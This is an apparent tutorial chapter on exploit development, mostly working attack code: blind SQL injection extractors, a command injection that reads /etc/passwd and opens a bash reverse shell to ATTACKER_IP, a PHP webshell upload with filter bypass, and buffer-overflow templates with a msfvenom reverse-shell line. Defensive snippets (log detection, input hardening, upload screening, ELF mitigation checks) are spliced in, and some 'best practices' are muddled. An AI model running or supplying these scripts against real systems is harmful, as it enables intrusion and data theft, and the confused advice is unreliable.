Exploit Development

🔥 Vibe Prompt

"Develop exploit for Blind SQLi: extract DB name, tables, columns via boolean-based inference."

Blind SQLi Exploit

import requests
import string

URL = "http://target.com/item?id=1"

def check(condition):
    """Returns True if condition is true"""
    payload = f"1 AND ({condition})"
    r = requests.get(URL.replace("id=1", f"id={payload}"))
    return "Item found" in r.text  # Boolean oracle

# Extract DB version
db_version = ""
for i in range(1, 10):
    for c in string.digits + ".":
        if check(f"SUBSTR(version(),{i},1)='{c}'"):
            db_version += c
            print(f"DB version: {db_version}")
            break

# Extract table names
tables = []
for i in range(1, 20):  # Try first 20 tables
    table_name = ""
    for j in range(1, 30):  # Max name length 30
        found = False
        for c in string.ascii_lowercase + "_":
            if check(f"SUBSTR((SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET {i-1}),{j},1)='{c}'"):
                table_name += c
                found = True
                break
        if not found:
            if table_name:
                tables.append(table_name)
                print(f"Table {i}: {table_name}")
            break

# Extract data from first table
data = ""
for i in range(1, 20):
    for c in string.printable:
        if c in ("'", "`"): continue
        payload = f"SUBSTR((SELECT * FROM {tables[0]} LIMIT 1),{i},1)='{c}'"
        if check(payload):
            data += c
            print(f"Data: {data}")
            break
    if len(data) < i:  # No more data
        break

Time-Based Blind SQLi

import requests, time

URL = "http://target.com/item?id=1"

def time_check(condition):
    """Returns True if the response stalls, i.e. the condition held (T-SQL WAITFOR syntax)"""
    payload = f"1; IF({condition}) WAITFOR DELAY '0:0:5'--"
    start = time.time()
    requests.get(URL.replace("id=1", f"id={payload}"), timeout=10)
    return time.time() - start > 4  # >4s = true

# Exploit: check if admin exists (the subquery needs its own parentheses inside IF)
if time_check("(SELECT COUNT(*) FROM users WHERE role='admin') > 0"):
    print("Admin user exists!")
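Detection logic for the traffic both scripts above produce, added here as an example (not code from the original page): it parses constructed access-log lines, decodes the id parameter without splitting on ';', and tallies boolean-based and time-based inference payloads per client, using the response time to confirm that a delay actually fired. The log format with a trailing millisecond field and all sample lines are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (not from a real server): combined log format,
# with the response time in milliseconds appended as the last field.
ACCESS_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item?id=1 HTTP/1.1" 200 512 3
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1%20AND%20(SUBSTR(version(),1,1)='5') HTTP/1.1" 200 512 4
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item?id=1%20AND%20(SUBSTR(version(),1,1)='8') HTTP/1.1" 200 210 4
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /item?id=1%20AND%20(SUBSTR((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%201%20OFFSET%200),1,1)='u') HTTP/1.1" 200 512 5
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /item?id=1;%20IF((SELECT%20COUNT(*)%20FROM%20users)%3E0)%20WAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1" 200 512 5012
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /item?id=42 HTTP/1.1" 200 498 3
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" \d+ \S+ (?P<ms>\d+)$')
# Fragments characteristic of the two inference styles shown above.
BOOLEAN_RE = re.compile(r"\bAND\b.*\b(SUBSTR|SUBSTRING|MID|ASCII)\s*\(", re.I)
TIME_RE = re.compile(r"WAITFOR\s+DELAY|\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(", re.I)

def query_params(path):
    """Split the query on '&' only, so a ';' inside a payload stays in the value."""
    for part in urlsplit(path).query.split("&"):
        key, _, value = part.partition("=")
        yield unquote_plus(key), unquote_plus(value)

def classify(value, ms):
    """Return None for a well-formed numeric id, else the inference class."""
    if value.isdigit():
        return None
    if TIME_RE.search(value):  # payload plus a slow answer: the delay fired
        return "time-based (confirmed)" if ms >= 4000 else "time-based"
    if BOOLEAN_RE.search(value):
        return "boolean-based"
    return "malformed id"

def analyze(log_text, param="id"):
    """Tally suspicious values of `param` per client IP."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for key, value in query_params(m["path"]):
            kind = classify(value, int(m["ms"])) if key == param else None
            if kind:
                hits[m["ip"]][kind] += 1
    return {ip: dict(c) for ip, c in hits.items()}
```

The per-client tally is the alerting signal: hundreds of non-numeric ids from one address within seconds is the signature of character-at-a-time inference, and the durable fix remains an integer type check plus a parameterized query on the server.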

Command Injection Exploit

import requests

# Ping command injection
payload = "127.0.0.1; cat /etc/passwd"
r = requests.post("http://target.com/ping", data={"ip": payload})
if "root:" in r.text:
    print("Command injection confirmed!")
    # Extract all users
    for line in r.text.split("\n"):
        if ":" in line and not line.startswith("<!"):
            print(f"User: {line.split(':')[0]}")

# Reverse shell
# Listen: nc -lvnp 4444
payload2 = "127.0.0.1; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"
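A hardened form of the ping endpoint above, added here as an example (not code from the original page): the target is allow-listed as an IP literal or a plain hostname and handed to ping as a single argv element with no shell, so the `;` in the payload above has nothing to interpret it. The `ping` function and the `/ping` backend it stands in for are assumptions.

```python
import ipaddress
import re
import subprocess

# One RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)

def validate_target(value):
    """Return the target if it is an IP literal or a plain hostname, else raise.
    Allow-listing the shape rejects ';', '|', '$(' and newlines before anything runs."""
    value = value.strip()
    try:
        return str(ipaddress.ip_address(value))  # 127.0.0.1 or ::1; trailing text fails
    except ValueError:
        pass
    if HOSTNAME_RE.match(value):
        return value
    raise ValueError(f"invalid ping target: {value!r}")

def is_valid_target(value):
    """Boolean form of validate_target for pre-checks and tests."""
    try:
        validate_target(value)
        return True
    except ValueError:
        return False

def build_ping_argv(value, count=1):
    """argv for ping: no shell is involved, so metacharacters in value are never parsed."""
    count = max(1, min(int(count), 10))  # bound the probe count as well
    return ["ping", "-c", str(count), validate_target(value)]

def ping(value, count=1, timeout=10):
    """Hypothetical safe backend for the /ping handler above (name is an assumption)."""
    proc = subprocess.run(build_ping_argv(value, count), capture_output=True,
                          text=True, timeout=timeout)
    return proc.returncode == 0, proc.stdout
```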

File Upload Exploit

import requests

# Upload webshell
files = {"file": ("shell.php", "<?php system($_GET['cmd']); ?>", "image/jpeg")}
r = requests.post("http://target.com/upload", files=files)

# Execute commands
r = requests.get(f"http://target.com/uploads/shell.php?cmd=id")
print(f"Command output: {r.text}")

# Better: use .phtml, .php5, .shtml (bypass extension filter)
files2 = {"file": ("shell.phtml", "<?=system($_GET['c'])?>", "image/jpeg")}
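Server-side screening that closes the upload path above, added here as an example (not the page's code): the extension is allow-listed rather than deny-listed (so .phtml, .php5 and .shtml fall out together with .php), double extensions are refused, the body must start with the magic bytes of the claimed image type instead of trusting the spoofed image/jpeg Content-Type, and the stored name is randomized so /uploads/shell.php is never a predictable URL. Function and table names are my own.

```python
import os
import re
import secrets

# Permitted extension -> magic bytes the body must start with. The declared
# Content-Type is never consulted: the client sets it, so it proves nothing.
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Exactly one dot: name.ext, nothing like shell.php.jpg or shell.php%00.jpg.
NAME_RE = re.compile(r"^[a-z0-9_-]{1,64}\.([a-z0-9]{1,5})$", re.I)

def screen_upload(filename, content):
    """Return (accepted, detail): detail is the randomized stored name or the reason."""
    base = os.path.basename(filename.replace("\\", "/"))  # drop any client-supplied path
    m = NAME_RE.match(base)
    if not m:
        return False, f"rejected: filename {base!r} is not a single name.ext"
    ext = m.group(1).lower()
    if ext not in ALLOWED:
        return False, f"rejected: extension .{ext} not permitted"
    if not content.startswith(ALLOWED[ext]):
        return False, f"rejected: body does not start with {ext} magic bytes"
    # Defense in depth against image/PHP polyglots; production code should also
    # re-encode the image so foreign bytes cannot survive into the stored file.
    if b"<?" in content:
        return False, "rejected: body contains a PHP open tag"
    return True, f"{secrets.token_hex(16)}.{ext}"
```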

Buffer Overflow (Basic)

import socket

shellcode = b""  # placeholder: generated separately (e.g. msfvenom), not part of this snippet

# EIP offset: 524 bytes
payload = b"A" * 524  # Fill buffer + EBP
payload += b"BBBB"     # Overwrite EIP (control execution)
payload += b"\x90" * 32  # NOP sled
payload += shellcode    # Your shellcode

s = socket.socket()
s.connect(("target.com", 9999))
s.send(payload + b"\r\n")
s.close()

Exploit Development Process

1. Fuzzing: find crash point (SPIKE, Peach)
   - Use tools like AFL or libFuzzer to identify vulnerable inputs
2. Control: determine offset to EIP
   - Analyze crash patterns to find where EIP is overwritten
3. Bad chars: identify bad bytes (\x00, \x0a)
   - Check for null terminators or control characters that break payloads
4. Return: find JMP ESP address (mona.py)
   - Use Mona.py to locate return addresses for shellcode execution
5. Shellcode: generate with msfvenom
   - Create platform-specific shellcode (Windows/Linux)
6. Exploit: assemble final payload
   - Combine NOP sled, return address, and shellcode
7. Test: debug with Immunity / WinDbg
   - Step through execution to verify functionality
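A defender's viability check for the Linux counterpart of the technique above, added here as an example that is not the page's code (the Windows tooling in the process list has no ELF equivalent): it parses an ELF64 program-header table for a non-executable stack, which stops shellcode behind a NOP sled from running, and for PIE, which together with ASLR invalidates a hard-coded return address such as a fixed JMP ESP. The 120-byte sample image is constructed inline so the parser runs offline.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header that records the requested stack permissions
PF_X = 0x1
ET_EXEC, ET_DYN = 2, 3

def elf_mitigations(data):
    """Report NX and PIE for a 64-bit little-endian ELF image already read into memory.
    nx is None when no PT_GNU_STACK header exists (the kernel then applies its default)."""
    if len(data) < 64 or data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a 64-bit little-endian ELF")
    e_type, = struct.unpack_from("<H", data, 16)
    e_phoff, = struct.unpack_from("<Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx = None
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)  # RW stack: a NOP sled + shellcode there cannot run
    return {"pie": e_type == ET_DYN, "nx": nx}

def build_sample_elf(pie, executable_stack):
    """Constructed 120-byte ELF64 image (header + one PT_GNU_STACK entry), not a real
    binary; it exists only so the parser can be exercised without a file on disk."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8        # ELFCLASS64, little-endian
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH",
        ET_DYN if pie else ET_EXEC, 0x3E, 1, 0x401000, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    flags = 0x6 | (PF_X if executable_stack else 0)                # RW, optionally +X
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, flags, 0, 0, 0, 0, 0, 0x10)
    return ehdr + phdr

if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else build_sample_elf(pie=False, executable_stack=True)
    print(elf_mitigations(data))
```

Run it with a path to any 64-bit ELF to inspect a real binary; stack canaries are not covered here because detecting them requires reading the symbol table for `__stack_chk_fail`.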

Python Exploit Template

#!/usr/bin/env python3
import sys, socket

def exploit(target, port):
    offset = 524
    eip = b"\x42\x42\x42\x42"
    
    # msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -b "\x00\x0a" -f python
    shellcode = b""
    
    payload = b"A" * offset + eip + b"\x90" * 16 + shellcode
    
    s = socket.socket()
    s.connect((target, port))
    s.send(payload)
    s.close()
    print(f"Exploit sent to {target}:{port}")

if __name__ == "__main__":
    exploit(sys.argv[1], int(sys.argv[2]))

Best Practices

  • Always use safe SEH/vectored exception handling
    • Prevent stack corruption through structured exception handling
  • Test exploit multiple times
    • Exploits often fail on first attempt due to environmental variability
  • Add version/OS checks before exploitation
    • Ensure exploit works against specific target configurations
  • Use Egghunters for limited buffer space
    • Bypass anti-virus detection by hiding shellcode
  • Document exploit prerequisites
    • Clearly state required conditions (e.g., specific OS version)
  • Clean up artifacts after testing
    • Remove temporary files or backdoors post-testing

Business Value of Exploit Development

Understanding exploit development isn't just about attacking systems; it's a critical skill for building secure applications. For developers and founders:

What

Exploit development involves identifying vulnerabilities (like SQLi, buffer overflows) and creating proof-of-concept attacks to demonstrate how they can be weaponized. This requires deep knowledge of system architecture, memory management, and attack patterns.

Why

  1. Risk Mitigation: Founders who understand exploits can proactively secure their products before attackers do.
  2. Cost Savings: A single data breach can cost millions. Exploit knowledge helps prevent financial losses.
  3. Competitive Advantage: Security-conscious companies attract more users and investors.
  4. Compliance: Many industries require proof of security testing (e.g., PCI-DSS).

How

  1. Vulnerability Scanning: Use tools like Burp Suite or OWASP ZAP to find weaknesses.
  2. PoC Development: Create minimal working exploits to validate vulnerabilities.
  3. Exploit Refinement: Optimize payloads for reliability and stealth.
  4. Integration: Embed security testing into CI/CD pipelines.

Transition to Web Vulnerability Exploitation

This chapter has equipped you with the foundational skills to understand how attackers exploit systems at a low level. In the next chapter, we'll apply these principles to web-specific vulnerabilities like SQL Injection, Cross-Site Scripting (XSS), and Server-Side Request Forgery (SSRF). You'll learn how to translate exploit development techniques into web application security, including bypassing Web Application Firewalls (WAFs) and automating attacks using Vibe Coding. The principles of fuzzing, payload crafting, and reverse engineering will directly apply to web contexts, making this knowledge invaluable for both offensive and defensive security roles. By mastering these concepts, you'll be prepared to either defend against or responsibly exploit web vulnerabilities in real-world scenarios.
